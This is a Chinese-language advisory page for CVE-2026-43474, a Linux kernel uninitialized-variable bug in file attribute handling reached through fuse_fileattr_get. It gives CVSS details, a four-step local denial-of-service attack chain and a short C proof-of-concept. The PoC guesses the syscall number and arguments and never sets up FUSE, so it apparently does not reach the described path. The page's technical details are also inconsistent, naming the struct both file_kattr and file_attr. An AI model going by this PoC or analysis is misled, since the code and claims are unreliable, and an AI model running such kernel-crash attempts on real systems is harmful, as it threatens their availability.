CVE-2026-43474 CVSS 5.5 中危

CVE-2026-43474 Linux内核未初始化变量漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43474

漏洞类型

未初始化变量

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核在fs/file_attr.c组件中存在一个安全漏洞，该漏洞被归类为未初始化变量问题。syzbot报告了在fuse_fileattr_get函数中发生KMSAN未初始化值读取错误。问题的根源在于，在调用vfs_fileattr_get()之前，内核没有正确初始化file_kattr结构体中的flags_valid标志。这可能导致本地低权限攻击者利用该漏洞引发系统内核崩溃或服务拒绝，从而影响系统的可用性。该漏洞的CVSS v3.1评分为5.5，属于中危级别。

技术细节

该漏洞的技术细节涉及Linux内核文件系统属性处理过程中的内存初始化缺失。具体而言，在fs/file_attr.c文件的__do_sys_file_getattr函数中，当处理文件属性获取请求时，内核创建了一个局部变量fa（类型为struct file_attr）。在调用vfs_fileattr_get()函数之前，代码路径未能正确初始化该结构体中的flags_valid成员字段。当后续代码尝试使用这个未初始化的值进行逻辑判断或操作时，就会访问栈上的未初始化内存区域。syzbot捕捉到的堆栈跟踪显示，错误发生在fuse_fileattr_get+0xeb4处，触发了KMSAN（KernelMemory Sanitizer）警告。由于攻击向量为本地（AV:L）且需要低权限（PR:L），本地攻击者可以通过特定的系统调用序列触发该路径，导致内核读取垃圾数据，进而可能引发内核恐慌（Kernel Panic）或拒绝服务，破坏系统稳定性。

攻击链分析

STEP 1

攻击者在本地系统获得低权限用户访问权限。

STEP 2

攻击者编写或运行恶意程序，该程序调用特定的系统API（如file_getattr相关调用）。

STEP 3

内核执行fs/file_attr.c中的__do_sys_file_getattr函数，并在未初始化flags_valid的情况下调用vfs_fileattr_get。

STEP 4

系统读取未初始化的内存值，触发KMSAN警告或导致内核崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43474
 * This code attempts to trigger the uninitialized value bug in fuse_fileattr_get.
 * Note: Exact syscall arguments may vary based on kernel version.
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <fcntl.h>

#ifndef SYS_file_getattr
// Assuming syscall number for demonstration, actual number depends on kernel
#define SYS_file_getattr 451 
#endif

int main() {
    int fd = open("/tmp/test_file", O_CREAT | O_RDWR, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Attempt to trigger the vulnerable path
    // The bug occurs when vfs_fileattr_get is called with uninitialized flags_valid
    long ret = syscall(SYS_file_getattr, fd, NULL);
    
    if (ret < 0) {
        perror("syscall file_getattr");
    } else {
        printf("Syscall returned, potential crash in kernel logs if vulnerable\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (Specific versions prior to commits 379e19e820dd, b8c182b2c8c4, cb184dd19154)

防御指南

临时缓解措施

建议系统管理员尽快检查内核版本，并应用官方提供的修复补丁。在无法立即升级的情况下，严格限制本地用户对系统调用特权的访问可能有助于降低风险，但最根本的解决方法是修复内核代码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表